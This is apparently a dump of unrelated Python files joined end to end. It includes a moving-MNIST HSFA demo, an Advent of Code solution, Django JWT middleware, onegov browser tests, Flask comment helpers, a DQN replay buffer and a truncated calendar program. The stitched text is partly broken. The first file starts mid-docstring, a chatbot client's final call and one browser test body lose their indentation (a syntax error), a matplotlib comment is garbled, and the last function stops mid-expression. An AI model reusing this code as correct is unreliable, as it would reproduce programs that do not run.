a one-digit version of the moving MNIST dataset. Each data point is 4096-dimensional.
.. image:: ../images/moving_mnist.gif
:align: center
If the change in x is not significantly faster or slower than the change in y, HSFA with only two output features
successfully extracts a smooth (and possibly flipped) representation of the position of the digit in the image.
Ground truth is only added for the comparison, not during training.
(Note that a problem like this can also be solved with linear SFA. This example serves the purpose of providing an
example on how an HSFA network is initialized and how it can be directly applied to image data without flattening.)
"""
import numpy as np
from sksfa import HSFA
import matplotlib.pyplot as plt
import os
# Loading and preparing the data
# - HSFA requires a colorchannel, even for grayscale images
split_ratio = 0.7  # fraction of the time-series used for training
data = np.load("data/mmnist_data.npy").squeeze()[..., None]
ground_truth = np.load("data/mmnist_positions.npy").squeeze()
n_points = data.shape[0]
split_idx = int(split_ratio * n_points)
# Chronological split: SFA relies on temporal order, so no shuffling.
training_data = data[:split_idx]
training_gt = ground_truth[:split_idx]
test_data = data[split_idx:]
test_gt = ground_truth[split_idx:]

# Preparing the HSFA-network:
# - each layer needs a 6-tuple for configuration
# - each 6-tuple contains (kernel_width, kernel_height, stride_width, stride_height, n_features, expansion_degree)
# The final layer will always be a full connected SFA layer
layer_configurations = [(8, 8, 8, 8, 8, 1),
                        (2, 2, 2, 2, 8, 2)]
hsfa = HSFA(n_components=2,
            input_shape=data.shape[1:],
            layer_configurations=layer_configurations,
            internal_batch_size=100,
            noise_std=0.01)
hsfa.summary()
hsfa.fit(training_data)
output = hsfa.transform(test_data)

# Order the ground-truth coordinates by the variance of their step-to-step
# change so each extracted (slow) feature is compared against the most
# similarly-paced coordinate.
gt_delta = np.var(test_gt[1:] - test_gt[:-1], axis=0)
gt_order = np.argsort(gt_delta)
gt_labels = ["x", "y"]

# Plot the two extracted features next to the true digit position.
fig, ax = plt.subplots(2, 2, sharex=True)
cutoff = 60  # only visualise the first 60 test frames
ax[0, 0].plot(output[:cutoff, 0])
ax[1, 0].plot(output[:cutoff, 1])
ax[0, 1].plot(test_gt[:cutoff, gt_order[0]])
ax[1, 1].plot(test_gt[:cutoff, gt_order[1]])
ax[0, 0].set_title("Extracted features")
ax[0, 1].set_title("True position")
plt.tight_layout()
plt.show()
|
"""Advent of Code Day 9 - Marble Mania"""
import collections
def marble_game(num_players, num_marbles):
    """Play a game of marbles and return the winning score.

    The circle is a deque rotated so the "current" marble is always the
    rightmost element, making both placement and the every-23rd-marble
    scoring rule O(1).

    Fix/robustness: the acting player is now derived directly from the
    marble number (``marble % num_players``) instead of a mutable counter
    whose increment sat in the non-scoring branch — the counter was easy
    to mis-indent and could mis-attribute scores.
    """
    circle = collections.deque([0])
    scores = collections.defaultdict(int)
    for marble in range(1, num_marbles + 1):
        if marble % 23 == 0:
            # Scoring turn: keep this marble plus the one 7 positions
            # counter-clockwise, then the marble after it becomes current.
            circle.rotate(7)
            scores[marble % num_players] += circle.pop() + marble
            circle.rotate(-1)
        else:
            # Place the marble two positions clockwise of current.
            circle.rotate(-1)
            circle.append(marble)
    return max(scores.values())
# Answer One
print("Small game:", marble_game(465, 71940))

# Answer Two (100x the marbles; the deque keeps this linear)
print("Large game:", marble_game(465, 7194000))
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from dtest import util as dtutil
import test_servers
import utils
class ServerMetaTest(test_servers.BaseServerTest):
    """Test that the server metadata API works as expected."""

    def test_list(self):
        """Test that we can retrieve metadata for a server."""
        # Fetch a fresh copy of the server under test
        server = self.os.servers.get(self.server)

        # The server must carry at least one metadata entry
        dtutil.assert_not_equal(len(server.metadata), 0)

        # Our key must be present and hold the expected value
        dtutil.assert_true(self.meta_key in server.metadata)
        dtutil.assert_equal(server.metadata[self.meta_key], self.meta_data)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import http.client
import urllib
import json
from constants import HOST, PORT
dest = ':'.join([HOST, PORT])
def getBotResponse(response):
    '''
    Extract the bot's reply from the server's JSON payload
    response - JSON formated server response
    return - actual string response from server
    '''
    parsed = json.loads(response)
    return parsed['response']
def client():
    """Interactive loop: read user input, query the chatbot server, print replies.

    Terminates on EOF (Ctrl-D).
    """
    # set up connection with server
    connection = http.client.HTTPConnection(dest)
    while True:
        try:
            user_input = input('user: ')
        except EOFError:
            break
        url_encoded_input = urllib.parse.quote(user_input)
        # NOTE(review): http.client sends the path verbatim; a leading '/'
        # is normally required — confirm the server accepts this relative
        # form before changing it.
        request_path = ''.join(['askmeanything/?q=', url_encoded_input])
        # Fix: HTTP method names are case-sensitive ('GET', not 'get');
        # http.client writes the method verbatim into the request line.
        connection.request('GET', request_path)
        # read the response
        response = connection.getresponse()
        print(getBotResponse(response.read().decode()))
    print("Conversation ended")
if __name__ == "__main__":
client()
|
# -*- coding: utf-8 -*-
# for python3
#
# いろいろ学習する
# python training.py {m} {pcsv} {ncsv} {pdump}
# m : 'p'=パーセプトロン, 'a'=AdaBoost+パーセプトロン, 's'=SVM
# pcsv : 正例のCSVファイル名
# ncsv : 負例のCSVファイル名
# pdump : 学習後のパラメータ
#
# python chk_training.py {m} {pcsv} {ncsv} {pdump}
# として実行すると、学習後のパラメータを入力して検証する
import os
import sys
import train_cls
import percep_cls
import ab_percep_cls
import svm_cls
mode = 1
# Invoked as chk_training.py -> verification mode instead of training.
if os.path.basename(sys.argv[0]) == 'chk_training.py':
    mode = 2

method = sys.argv[1]      # 'p'=perceptron, 'a'=AdaBoost+perceptron, 's'=SVM
posi_file = sys.argv[2]   # positive-example CSV
nega_file = sys.argv[3]   # negative-example CSV
param_file = sys.argv[4]  # learned-parameter dump file

print("mode=%d method=%s" % (mode, method))

# Map each method flag to its classifier factory. Unknown flags fall
# through silently, exactly like the original if/elif chain; the mapping
# removes the three copy-pasted training/check branches.
classifiers = {
    'p': percep_cls.Perceptron,
    'a': ab_percep_cls.AB_Perceptron,
    's': svm_cls.SVM,
}
if method in classifiers:
    training = train_cls.Training(classifiers[method]())
    if mode == 1:
        training.training(posi_file, nega_file, param_file)
    else:
        training.check(posi_file, nega_file, param_file)
|
#!/usr/bin/python
#\file find_changept.py
#\brief Find a change point of a function.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Mar.27, 2021
import scipy.optimize
'''
Find a change point of a function.
Assume a function func(x)={True,False} which has only one change point x0
where func(x)=True if x<x0 else False.
We try to find x0.
'''
if __name__ == '__main__':
    # Example: func has its change point at x0=0.5 (False below, True above).
    def func(x):
        return x > 0.5

    bounds = [0.0, 1.0]

    # Auxiliary function converting the change-point search into a scalar
    # minimization: where func holds inside [bounds] the value grows with x,
    # elsewhere it is the constant 1.0, so the bounded minimizer converges
    # to the smallest x with func(x)==True.
    def func_opt(x):
        return (x - bounds[0]) / (bounds[1] - bounds[0]) if func(x) and x >= bounds[0] else 1.0

    #res= scipy.optimize.golden(func_opt, brack=bound, tol=1e-06, maxiter=1000)
    res = scipy.optimize.minimize_scalar(func_opt, bounds=bounds, method='bounded',
                                         options={'xatol': 1e-05, 'maxiter': 500})
    # Fix: the original used Python 2 print statements, which are a
    # SyntaxError on Python 3; use the print() function instead.
    print(res)
    print(res.x, func(res.x), func_opt(res.x), func_opt(1), func_opt(0), func_opt(0.55))
|
"""
תשע"ה מועד א' שאלה 1
"""
import numpy as np
from numpy import random as rn
import matplotlib.pyplot as plt
s = 0.35   # noise amplitude
c = 1      # drift coefficient
M = 50000  # number of Monte-Carlo sample paths
T = 2      # time horizon
N = 200    # number of time steps
dw1 = rn.randn(M, N)        # standard-normal Brownian increments
X0 = -1 + 2 * rn.rand(M)    # initial condition uniform on [-1, 1]
h = T / N                   # step size
X = np.ones((M, N + 1))
X[:, 0] = X0
# Euler-Maruyama scheme for dX = -c*X*(X^2-1) dt + s/(1+X^2) dW
for i in range(0, N):
    X[:, i+1] = X[:, i] - c*X[:, i]*h*(X[:, i]**2 - 1) + s*dw1[:, i]*np.sqrt(h)/(1 + X[:, i]**2)
EX = np.mean(X[:, -1])
VX = np.var(X[:, -1])
print("EX2=", EX)
print("VX2=", VX)
# Fix: `normed` was removed from matplotlib (3.1 deprecation, gone since
# 4.0/3.x releases); `density=True` is the drop-in replacement.
plt.hist(X[:, -1], bins=1000, density=True)
plt.show()
|
"""
tests for {{cookiecutter.package_name}}
"""
|
import logging
from django.contrib.auth.models import AnonymousUser
from django.utils.deprecation import MiddlewareMixin
from rest_framework.request import Request
from rest_framework_simplejwt.authentication import JWTAuthentication
from project_management.models import ProjectUser
from site_manage.models import SiteUser
from user.models import UserOrganisation
# request_logger = logging.getLogger('django.request')
request_logger = logging.getLogger(__name__)
class AssignSiteAndProject(MiddlewareMixin):
    """Middleware attaching project/organisation/site to every request.

    The user is resolved from the JWT (not the session); the first
    matching ProjectUser / UserOrganisation / SiteUser row provides the
    related object, with None for missing links or anonymous users.
    """

    def process_request(self, request, *args, **kwargs):
        user = self.__get_user_jwt(request)
        if not user or user.is_anonymous:
            # Anonymous request: expose the attributes but leave them unset
            # so downstream code can read them unconditionally.
            request.project = None
            request.organisation = None
            request.site = None
            return None
        request.project = self._get_project(user)
        request.organisation = self.__get_organisation(user)
        request.site = self.__get_site(user)

    def _get_project(self, user):
        """Return the first project linked to *user*, or None."""
        return getattr(ProjectUser.objects.filter(user=user).first(), 'project', None)

    def __get_organisation(self, user):
        """Return the first organisation linked to *user*, or None."""
        return getattr(UserOrganisation.objects.filter(user=user).first(), 'organization', None)

    def __get_site(self, user):
        """Return the first site linked to *user*, or None."""
        return getattr(SiteUser.objects.filter(user=user).first(), 'site', None)

    def __get_user_jwt(self, request):
        """
        Replacement for django session auth get_user & auth.get_user
        JSON Web Token authentication. Inspects the token for the user_id,
        attempts to get that user from the DB & assigns the user on the
        request object. Otherwise it defaults to AnonymousUser.
        This will work with existing decorators like LoginRequired ;)
        Returns: instance of user object or AnonymousUser object
        """
        user = None
        try:
            user_jwt = JWTAuthentication().authenticate(Request(request))
            if user_jwt is not None:
                # store the first part from the tuple (user, obj)
                user = user_jwt[0]
        except Exception:
            # Fix: narrowed from a bare except (which also trapped
            # SystemExit/KeyboardInterrupt) and log at debug level so
            # genuine auth failures are no longer completely invisible.
            request_logger.debug("JWT authentication failed", exc_info=True)
        return user or AnonymousUser()
|
from .compile import CompileCodeResource
|
import pytest
import requests
import transaction
from datetime import datetime, timedelta
from onegov.core.utils import module_path
from onegov.directory import DirectoryCollection
from onegov.file import FileCollection
from onegov.people import Person
from tests.shared.utils import create_image
from pytz import UTC
from sedate import utcnow
from tempfile import NamedTemporaryFile
from time import sleep
from tests.shared.utils import encode_map_value
from onegov.org.models import ResourceRecipientCollection
import os
from pathlib import Path
from onegov.reservation import ResourceCollection
from onegov.ticket import TicketCollection
from tests.onegov.org.test_views_resources import add_reservation
def test_browse_activities(browser):
    """The timeline is visible to admins but errors out for anonymous users."""
    # admins
    browser.login_admin()
    browser.visit('/timeline')
    assert browser.is_text_present("Noch keine Aktivität")

    # anonymous
    browser.logout()
    browser.visit(
        '/timeline', expected_errors=[{'rgxp': '/timeline - Failed'}]
    )
    assert not browser.is_text_present("Noch keine Aktivität")
@pytest.mark.parametrize("field", (
    'Photo = *.png|*.jpg',
    'Photo *= *.png|*.jpg',
))
def test_browse_directory_uploads(browser, org_app, field):
    """Upload, keep, replace and delete a directory entry image.

    Runs once with an optional and once with a required photo field;
    deleting the picture must fail validation only for the required variant.
    """
    DirectoryCollection(org_app.session(), type='extended').add(
        title="Crime Scenes",
        structure="""
            Name *= ___
            Description *= ...
            {field}
        """.format(field=field),
        configuration="""
            title:
                - name
            order:
                - name
            display:
                content:
                    - name
                    - description
                    - photo
        """,
        type='extended'
    )
    transaction.commit()

    # create a new page with a picture
    photo = create_image(output=NamedTemporaryFile(suffix='.png'))

    browser.login_admin()
    browser.visit('/directories/crime-scenes/+new')
    browser.fill('name', "Seven Seas Motel")
    browser.fill('description', "First victim of Ice Truck Killer")
    browser.fill('photo', photo.name)
    browser.find_by_value("Absenden").click()

    assert browser.is_text_present("Seven Seas Motel")
    assert browser.is_element_present_by_css('.field-display img')

    src = browser.find_by_css('.field-display img')['src']

    # elect to keep the picture (default)
    browser.find_by_css('.edit-link').click()
    browser.fill('name', "Seven Seas Motel, Miami")
    browser.find_by_value("Absenden").click()

    assert browser.is_text_present("Seven Seas Motel, Miami")
    assert browser.is_element_present_by_css('.field-display img')
    assert browser.find_by_css('.field-display img')['src'] == src

    # elect to replace the picture
    photo = create_image(output=NamedTemporaryFile(suffix='.png'))

    browser.find_by_css('.edit-link').click()
    browser.choose('photo', 'replace')
    browser.find_by_name('photo')[3].value = photo.name
    browser.find_by_value("Absenden").click()

    assert browser.is_element_present_by_css('.field-display img')
    assert browser.find_by_css('.field-display img')['src'] != src

    # elect to delete the picture
    browser.find_by_css('.edit-link').click()
    browser.choose('photo', 'delete')
    browser.find_by_value("Absenden").click()

    # only the optional field may end up without an image
    if field.startswith('Photo ='):
        assert not browser.is_element_present_by_css('.field-display img')
    else:
        assert browser.is_text_present("Dieses Feld wird benötigt")
def test_upload_image_with_error(browser, org_app):
    """A failed form submission must not retain the previously uploaded image."""
    DirectoryCollection(org_app.session(), type='extended').add(
        title="Crime Scenes",
        structure="""
            Name *= ___
            Description *= ...
            Photo = *.jpg|*.png
        """,
        configuration="""
            title:
                - name
            order:
                - name
            display:
                content:
                    - name
                    - description
                    - photo
        """,
        type='extended'
    )
    transaction.commit()

    # create a new page with a missing field (but do supply the picture)
    photo = create_image(output=NamedTemporaryFile(suffix='.png'))

    browser.login_admin()
    browser.visit('/directories/crime-scenes/+new')
    browser.fill('name', "Seven Seas Motel")
    browser.fill('photo', photo.name)
    browser.find_by_value("Absenden").click()

    assert browser.is_text_present("Dieses Feld wird benötigt")

    # try again with the missing field present
    browser.fill('description', "First victim of Ice Truck Killer")
    browser.find_by_value("Absenden").click()

    assert browser.is_text_present("Seven Seas Motel")

    # the image won't be there however (it gets cleared in between requests)
    assert not browser.is_element_present_by_css('.field-display img')
@pytest.mark.skip('Picture upload is needed to check scaling')
def test_directory_thumbnail_views(browser, org_app):
    """Entry with one thumbnail field and one regular image field (skipped)."""
    DirectoryCollection(org_app.session(), type='extended').add(
        title="Jam Session",
        structure="""
            Name *= ___
            Photo = *.jpg|*.png
            Instruments = *.jpg|*.png
        """,
        configuration="""
            title:
                - name
            order:
                - name
            display:
                content:
                    - name
                    - instruments
                    - photo
            show_as_thumbnails:
                - photo
        """,
        type='extended'
    )
    transaction.commit()

    browser.login_admin()
    browser.visit('/directories/jam-session/+new')
    photo = create_image(output=NamedTemporaryFile(suffix='.png'))
    browser.fill('name', 'Bar59')
    browser.fill('photo', photo.name)
    browser.fill('instruments', photo.name)
    browser.find_by_value("Absenden").click()
@pytest.mark.skip("Passes locally, but not in CI, skip for now")
def test_browse_directory_editor(browser, org_app):
browser.login_admin()
browser.visit('/directories/+new')
assert browser.is_element_present_by_css('.formcode-toolbar', wait_time=5)
browser.fill('title', "Restaurants")
# add a title through the dropdown menu
browser.find_by_css('.formcode-toolbar-element').scroll_to()
browser.find_by_css('.formcode-toolbar-element').click()
browser.find_by_css('.formcode-snippet-name')[0].scroll_to()
browser.find_by_css('.formcode-snippet-name')[0].click()
# add a text through the dropdown menu
browser.find_by_css('.formcode-toolbar-element').scroll_to()
browser.find_by_css('.formcode-toolbar-element').click()
sleep(.25)
browser.find_by_css('.formcode-snippet-name')[1].scroll_to()
browser.find_by_css('.formcode-snippet-name')[1].mouse_over()
sleep(.25)
browser.find_by_css('.formcode-snippet-required')[0].scroll_to()
browser.find_by_css('.formcode-snippet-required')[0].click()
assert browser.find_by_css('#structure').value == (
"# Titel\n"
"Text *= ___\n"
)
# Add the title to the title format
browser.scroll_to_css('#title_format')
assert browser.is_element_present_by_xpath(
'(//div[@class="formcode-toolbar-element"])[2]', wait_time=5)
browser.find_by_css('.formcode-toolbar-element')[1].click()
browser.find_by_css('.formcode-snippet-name')[0].click()
assert browser.find_by_css('#title_format').value == '[Titel/Text]'
# Add it to the lead format as well
browser.scroll_to_css('#lead_format')
assert browser.is_element_present_by_xpath(
'(//div[@class="formcode-toolbar-element"])[3]', wait_time=5)
browser.find_by_css('.formcode-toolbar-element')[2].click()
browser.find_by_css('.formcode-snippet-name')[0].click()
assert browser.find_by_css('#lead_format').value == '[Titel/Text]'
# Elect to show the fields in the main view
browser.find_by_css('.formcode-select label').click()
assert browser.find_by_css('#content_fields').value == "Titel/Text"
# Save the form and ensure that after the load we get the same selections
submit = browser.find_by_value("Absenden")
submit.scroll_to()
submit.click()
browser.find_by_css('.edit-link').click()
assert browser.find_by_css('.formcode-select input')[0].checked
assert not browser.find_by_css('.formcode-select input')[1].checked
def test_browse_directory_coordinates(browser, org_app):
    """Directory entries with map coordinates show clickable markers/popups."""
    DirectoryCollection(org_app.session(), type='extended').add(
        title="Restaurants",
        structure="""
            Name *= ___
            Tables = 0..1000
        """,
        configuration="""
            title: '[name]'
            lead: 'Offers [tables] tables'
            order:
                - name
            display:
                content:
                    - name
        """,
        meta={
            'enable_map': 'everywhere'
        },
        type='extended'
    )
    transaction.commit()

    # create two restaurants with two different coordinates
    browser.login_admin()

    browser.visit('/directories/restaurants/+new')
    browser.fill('name', "City Wok")
    browser.fill('tables', "10")
    assert browser.is_element_present_by_css('.add-point-active', wait_time=5)
    browser.execute_script('document.leafletmaps[0].panBy([-100, 100]);')
    browser.find_by_css('.add-point-active').click()
    browser.find_by_value("Absenden").click()

    browser.visit('/directories/restaurants/+new')
    browser.fill('name', "City Sushi")
    browser.fill('tables', "20")
    assert browser.is_element_present_by_css('.add-point-active', wait_time=5)
    browser.execute_script('document.leafletmaps[0].panBy([100, -100]);')
    browser.find_by_css('.add-point-active').click()
    browser.find_by_value("Absenden").click()

    # make sure the restaurants are visible in the overview
    browser.visit('/directories/restaurants')
    assert "Offers 20 tables" in browser.html
    assert "Offers 10 tables" in browser.html

    # as well as their points, which we can toggle
    assert not browser.is_element_present_by_css('.popup-title')
    assert not browser.is_element_present_by_css('.popup-lead')
    browser.find_by_css('.vector-marker')[1].click()
    assert browser.is_element_present_by_css('.popup-title')
    assert browser.is_element_present_by_css('.popup-lead')

    # the popup leads us to the restaurant
    browser.find_by_css('.popup-title').click()
    assert browser.is_element_present_by_id(
        'page-directories-restaurants-city-wok')
def test_publication_workflow(browser, temporary_path, org_app):
    """Browser test: uploads a file, unpublishes it, sets a publication
    date and verifies the hourly cronjob republishes it."""
    path = temporary_path / 'foo.txt'
    with path.open('w') as f:
        f.write('bar')
    browser.login_admin()
    browser.visit('/files')
    # upload a file
    assert not browser.is_text_present("Soeben hochgeladen")
    browser.drop_file('.upload-dropzone', path)
    assert browser.is_text_present("Soeben hochgeladen")
    # show the details
    browser.find_by_css('.upload-filelist .untoggled').click()
    assert browser.is_text_present("Öffentlich")
    assert not browser.is_text_present("Privat")
    assert not browser.is_text_present("Publikationsdatum")
    # make sure the file can be downloaded
    file_url = browser.find_by_css('.file-preview')['href']
    r = requests.get(file_url)
    assert r.status_code == 200
    assert 'public' in r.headers['cache-control']
    # make sure unpublishing works
    browser.find_by_css('.publication .file-status-tag a').click()
    r = requests.get(file_url)
    assert r.status_code == 403
    assert browser.is_text_present("Privat", wait_time=1)
    assert browser.is_text_present("Publikationsdatum")
    assert not browser.is_text_present("Öffentlich")
    # enter a publication date in the past (no type date support in selenium)
    # set as the time of the layout timezone. UTC date can be a day before
    browser.find_by_name('hour').select('00:00')
    assert browser.is_text_present("Wird publiziert am", wait_time=1)
    assert not browser.is_text_present("Publikationsdatum")
    f = FileCollection(org_app.session()).query().one()
    dt = datetime.today()
    midnight = datetime(dt.year, dt.month, dt.day, 0, tzinfo=UTC)
    # the stored publish date is in UTC; accept any CET/CEST offset
    assert f.publish_date in (
        midnight,  # utc
        midnight - timedelta(hours=1),  # +1:00 winter, Europe
        midnight - timedelta(hours=2)  # +2:00 summer, Europa
    )
    # run the cronjob and make sure it works
    job = org_app.config.cronjob_registry.cronjobs['hourly_maintenance_tasks']
    job.app = org_app
    job_url = f'{browser.url.replace("/files", "")}/cronjobs/{job.id}'
    requests.get(job_url)
    sleep(0.1)
    r = requests.get(file_url)
    assert r.status_code == 200
    assert 'public' in r.headers['cache-control']
def test_signature_workflow(browser, temporary_path, org_app):
    """Browser test: uploads a PDF and exercises the digital-seal dialog.

    Actual signing cannot succeed in this environment (different process),
    so only the error handling and the display of pre-set signature
    metadata are verified.
    """
    path = module_path('tests.onegov.org', 'fixtures/sample.pdf')
    org_app.enable_yubikey = True
    # upload the pdf
    browser.login_admin()
    browser.visit('/files')
    browser.drop_file('.upload-dropzone', path)
    assert browser.is_text_present("Soeben hochgeladen")
    # show the details
    browser.find_by_css('.upload-filelist .untoggled').click()
    assert browser.is_text_present("Ohne digitales Siegel")
    # try to sign the pdf (this won't work in this test-environment due to
    # it being in a different process, but we should see the error handling)
    browser.find_by_css('a.is-not-signed').click()
    assert browser.is_text_present("Bitte geben Sie Ihren Yubikey ein")
    assert browser.is_text_present("Signieren")
    browser.find_by_css('.dialog input').fill('foobar')
    browser.find_by_text("Signieren").click()
    assert browser.is_text_present("nicht mit einem Yubikey verknüpft")
    # change the database and show the information in the browser
    f = FileCollection(org_app.session()).query().one()
    f.signed = True
    f.signature_metadata = {
        'signee': 'foo@example.org',
        'timestamp': utcnow().isoformat()
    }
    transaction.commit()
    # make sure the signature information is shown
    browser.visit('/files')
    browser.find_by_css('.untoggled').click()
    assert browser.is_text_present('foo@example.org')
    assert browser.is_text_present('Digitales Siegel angewendet')
def test_external_map_link(browser, client):
    """Browser test: switches the geo provider to Geo-BS and verifies a
    topic with coordinates shows the external map link."""
    client.login_admin()
    settings = client.get('/map-settings')
    settings.form['geo_provider'] = 'geo-bs'
    settings.form.submit()
    topic = client.get('/topics/themen')
    topic = topic.click('Bearbeiten')
    topic.form['coordinates'] = encode_map_value({
        'lat': 47, 'lon': 8, 'zoom': 12
    })
    topic.form.submit()
    browser.visit('/topics/themen')
    browser.find_by_css(".button-state").click()
    assert browser.is_text_present("Karte Geo-BS")
@pytest.mark.flaky(reruns=3)
def test_context_specific_function_are_displayed_in_person_directory(browser,
                                                                     client):
    """Browser test: assigns a page-specific function to a person and
    verifies it appears on the person's directory page."""
    browser.login_admin()
    client.login_admin()
    browser.visit('/people/new')
    browser.fill_form({
        'first_name': 'Berry',
        'last_name': 'Boolean'
    })
    browser.find_by_value("Absenden").click()
    person = client.app.session().query(Person)\
        .filter(Person.last_name == 'Boolean')\
        .one()
    browser.visit('/editor/new/page/1')
    browser.fill_form({
        'title': 'All About Berry',
        'people_' + person.id.hex: True,
        'people_' + person.id.hex + '_function': 'Logician'
    })
    browser.find_by_value("Absenden").click()
    browser.visit(f"/person/{person.id.hex}")
    browser.find_by_text('All About Berry: Logician')
def test_rejected_reservation_sends_email_to_configured_recipients(browser,
                                                                   client):
    """Browser test: configures a rejection-notification recipient, rejects
    a reservation through the ticket UI and asserts that exactly one
    notification mail was written to the maildir."""
    resources = ResourceCollection(client.app.libres_context)
    dailypass = resources.add('Dailypass', 'Europe/Zurich', type='daypass')
    recipients = ResourceRecipientCollection(client.app.session())
    recipients.add(
        name='John',
        medium='email',
        address='john@example.org',
        rejected_reservations=True,
        resources=[
            dailypass.id.hex,
        ]
    )
    add_reservation(
        dailypass, client, datetime(2017, 1, 6, 12), datetime(2017, 1, 6, 16))
    transaction.commit()
    tickets = TicketCollection(client.app.session())
    assert tickets.query().count() == 1
    browser.login_admin()
    browser.visit('/tickets/ALL/open')
    browser.find_by_value("Annehmen").click()

    def is_advanced_dropdown_present():
        # the 'Erweitert' (advanced) dropdown renders asynchronously
        e = [e for e in browser.find_by_tag("button") if 'Erweitert' in e.text]
        return len(e) == 1

    browser.wait_for(
        lambda: is_advanced_dropdown_present(),
        timeout=5,
    )
    advanced_menu_options = browser.find_by_tag("button")
    next(e for e in advanced_menu_options if 'Erweitert' in e.text).click()
    browser.wait_for(
        lambda: browser.is_element_present_by_xpath(
            '//a['
            '@data-confirm="Möchten Sie diese Reservation wirklich absagen?"]'
        ),
        timeout=5,
    )
    reject_reservation = browser.find_by_xpath(
        '//a[@data-confirm="Möchten Sie diese Reservation wirklich absagen?"]'
    )[0]
    reject_reservation.click()
    # confirm dialog
    browser.find_by_value("Reservation absagen").click()
    assert browser.is_text_present("Die Reservation wurde abgelehnt")
    assert len(os.listdir(client.app.maildir)) == 1
    mail = Path(client.app.maildir) / os.listdir(client.app.maildir)[0]
    with open(mail, 'r') as file:
        mail_content = file.read()
    assert (
        "Die folgenden Reservationen mussten leider abgesagt werden:"
        in mail_content
    )
|
# Read a Fahrenheit temperature from stdin, convert it to Celsius and
# print both values with one decimal place.
fahrenheit = float(input('请输入华氏温度:'))
celsius = (fahrenheit - 32) / 1.8
print('华氏温度%.1f = 摄氏温度为%.1f' % (fahrenheit, celsius))
from flask import render_template
import re
import json
from .. import db
from ..work import views
from ..models import Comment
def add_comment(json, comment):
    """Persist *comment*, optionally attaching author and parent from *json*.

    ``json`` is the request payload dict (the name shadows the imported
    ``json`` module, kept for caller compatibility). Recognized keys:
    ``user_id`` (comment author) and ``parent_id`` (makes this a reply).
    Returns the id of the committed comment.
    """
    if 'user_id' in json:
        comment.user_id = json['user_id']
    if 'parent_id' in json:
        parent_comment = Comment.query.filter_by(id=json['parent_id']).first()
        # Bug fix: guard against dangling parent ids -- the original
        # dereferenced a possibly-None query result and raised
        # AttributeError.
        if parent_comment is not None:
            parent_comment.comments.append(comment)
            db.session.add(parent_comment)
    db.session.add(comment)
    db.session.commit()
    return comment.id
def add_reply(json):
    """Create a reply comment from the request payload and persist it."""
    reply = Comment(text=json['text'])
    return add_comment(json, reply)
def add_comment_to_bookmark(json):
    """Create a comment attached to the bookmark named in *json* and
    persist it."""
    new_comment = Comment(text=json['text'])
    new_comment.bookmark_id = json['bookmark_id']
    return add_comment(json, new_comment)
def add_comment_to_chapter(json):
    """Create a comment attached to the chapter named in *json* and
    persist it."""
    new_comment = Comment(text=json['text'])
    new_comment.chapter_id = json['chapter_id']
    return add_comment(json, new_comment)
def delete_comment(comment_id, user_id, admin_override=False):
    """Delete the comment with *comment_id* if it belongs to *user_id*
    (or if *admin_override* is set).

    Detaches a reply from its parent's reply list, or orphans the replies
    of a top-level comment, then deletes the row and commits.
    """
    comment = Comment.query.filter_by(id=comment_id).first()
    # Bug fix: check for a missing comment first -- the original accessed
    # comment.user_id before its None check and raised AttributeError for
    # unknown ids.
    if comment is None:
        return
    # Only the author may delete, unless an admin overrides.
    if comment.user_id != user_id and not admin_override:
        return
    if comment.parent_comment != []:
        # A reply: remove it from its parent's reply list.
        comment.parent_comment[0].replies.remove(comment)
    else:
        # A top-level comment: detach its replies.
        comment.replies = []
    Comment.query.filter_by(id=comment_id).delete()
    db.session.commit()
from ...config import params
from collections import deque
import random
import numpy as np
from ..update_strategy.normalDQN import normalStrategy
class NormalStrategy:
    """Experience-replay buffer with uniform ("normal") minibatch sampling.

    Experiences are dicts with keys 'state', 'action', 'reward',
    'next_state' and 'done'. The buffer is bounded by
    params.size_of_experience and replayed in minibatches of
    params.mini_batch_size.
    """

    def __init__(self):
        # FIFO replay memory, bounded in storeExperience.
        self.memory = deque()
        # NOTE(review): 'noram' looks like a typo for 'normal'; the name is
        # kept since external code may access the attribute.
        self.noram = normalStrategy()

    def getLength(self):
        """Return the number of stored experiences."""
        return len(self.memory)

    def getHeldoutSet(self):
        """Return the states of one randomly sampled minibatch."""
        return [exp['state'] for exp in self.selectMiniBatch()]

    def selectMiniBatch(self):
        """Uniformly sample up to params.mini_batch_size experiences."""
        count = min(len(self.memory), params.mini_batch_size)
        # Sample from a list copy: indexing a deque is O(n), which made
        # random.sample on the deque itself O(k*n).
        return random.sample(list(self.memory), count)

    def storeExperience(self, exp):
        """Append an experience, evicting the oldest entry when full."""
        if len(self.memory) > params.size_of_experience:
            self.memory.popleft()
        self.memory.append(exp)

    def experienceReplay(self, model, target_weights, update_policy):
        """Train *model* on one sampled minibatch.

        Builds Q-learning targets: the raw reward for terminal transitions,
        otherwise reward plus the discounted next-state value (discount
        factor params.y). Returns the training summary from the model.
        """
        sexperiences = self.selectMiniBatch()
        X_val = []
        Y_val = []
        next_states = []
        target_action_mask = np.zeros(
            (len(sexperiences), model.output_size), dtype=int)
        for index, exp in enumerate(sexperiences):
            X_val.append(exp['state'])
            target_action_mask[index][exp['action']] = 1
            next_states.append(exp['next_state'])
        nextStatesValues = update_policy.execute(
            model, next_states, target_weights)
        for index, exp in enumerate(sexperiences):
            if exp['done']:
                # Terminal transition: no bootstrapped future value.
                Y_val.append(exp['reward'])
            else:
                Y_val.append(
                    exp['reward'] + nextStatesValues[index] * params.y)
        summary, TDerror = model.executeStep(
            np.array(X_val), np.array(Y_val), target_action_mask)
        return summary
|
#输入1970以来的一年及月份,从而打印日历的一个程序
def is_bissextile(year):
    """Return True when *year* is a Gregorian leap year."""
    # Multiples of 400 are always leap years.
    if year % 400 == 0:
        return True
    # Otherwise: divisible by 4 but not a century year.
    return year % 4 == 0 and year % 100 != 0
def days_of_month(year, month):
    """Return the number of days in *month* (1-12) of *year*."""
    if month == 2:
        # February depends on whether the year is a leap year.
        return 29 if is_bissextile(year) else 28
    # 31-day months; every other remaining month has 30 days.
    return 31 if month in (1, 3, 5, 7, 8, 10, 12) else 30
def total_days(years):
    """Return the days elapsed from 1970-01-01 up to January 1st of
    year *years*."""
    return sum(
